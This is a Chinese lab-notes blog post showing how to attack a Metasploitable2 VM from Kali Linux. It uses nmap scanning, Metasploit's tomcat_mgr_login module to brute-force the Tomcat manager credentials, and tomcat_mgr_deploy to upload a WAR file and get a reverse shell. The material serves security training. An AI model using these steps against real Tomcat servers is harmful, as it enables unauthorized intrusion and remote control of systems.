kali linux对Metasploitable2漏洞利用,tomcat管理用户爆力破解/利用tomcat upload 功能反弹shel笔记

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程1:

step1:探测

nmap 192.168.172.129

nmap -sV -o  192.168.172.129

 

step2:爆破

启动msf

命令:use auxiliary/scanner/http/tomcat_mgr_login

show options 

set rhosts 192.168.172.129

set rport 8180

run

爆破成功,用户密码为:tomcat /tomcat

攻击过程2:

step1:探测略

step2:漏洞利用

启动msf

命令:use exploit/multi/http/tomcat_mgr_deploy

show options

set httpusername tomcat          //指定用户名

set httppassword tomcat         //指定用户密码

set rhosts 192.168.172.129

set rport 8180

exploit

漏洞利用成功。

漏洞利用的原理就是上传一个war文件,然后反弹shell。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值